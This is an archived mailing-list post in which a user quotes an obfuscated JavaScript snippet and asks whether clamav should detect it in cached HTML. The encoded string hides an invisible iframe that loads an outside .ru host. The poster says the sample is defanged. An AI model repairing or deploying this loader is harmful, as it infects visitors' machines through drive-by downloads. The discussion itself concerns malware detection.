[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[no subject]

   ------------------
     var k='?gly#v|oh%ylvlelolw|
            =#klggh>srvlwlrq=#devroxwh>#
            ohiw#>#wrs=#4%A?liudph#vuf@%
            kwws2xvhu431liudph1ux#iudpherughu at 3#
            yvsd@#vsdfh at 3#zlgwk at 4#khlw at 4#pdujlqzlgwk at 3#
            pdujhjkw at 3#vflqj at qrA?2lihA?2glyA'
     var t=9999;
     var h='';
     while( t<=k.length-1 ) {
       h = h+String.fromCharCode(k.charCodeAt(t++)-2);
     }
     document.write(h);
    ----------

The above (in it's original state), downloads and installs some nasty
things.  As it is above it is pretty harmless, but still potentially
dangerous.  

The question I have is this:  Shouldn't clamav see code like this as a
virus when scanning cached HTML on a filesystem?

-Jim P.





</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<ul><li><strong>Follow-Ups</strong>:
<ul>
<li><strong><a name="00956" href="msg00956.html">[ale] javascript Virus</a></strong>
<ul><li><em>From:</em> james.sumners at gmail.com (James Sumners)</li></ul></li>
<li><strong><a name="00979" href="msg00979.html">[ale] javascript  Virus</a></strong>
<ul><li><em>From:</em> Dow.Hurst at mindspring.com (Dow Hurst)</li></ul></li>
</ul></li></ul>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<ul>
<li>Prev by Date:
<strong><a href="msg00954.html">[ale] $SIG{'HUP'}</a></strong>
</li>
<li>Next by Date:
<strong><a href="msg00956.html">[ale] javascript Virus</a></strong>
</li>
<li>Previous by thread:
<strong><a href="msg00960.html">[ale] $SIG{'HUP'}</a></strong>
</li>
<li>Next by thread:
<strong><a href="msg00956.html">[ale] javascript Virus</a></strong>
</li>
<li>Index(es):
<ul>
<li><a href="maillist.html#00955"><strong>Date</strong></a></li>
<li><a href="threads.html#00955"><strong>Thread</strong></a></li>
</ul>
</li>
</ul>

<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
</body>
</html>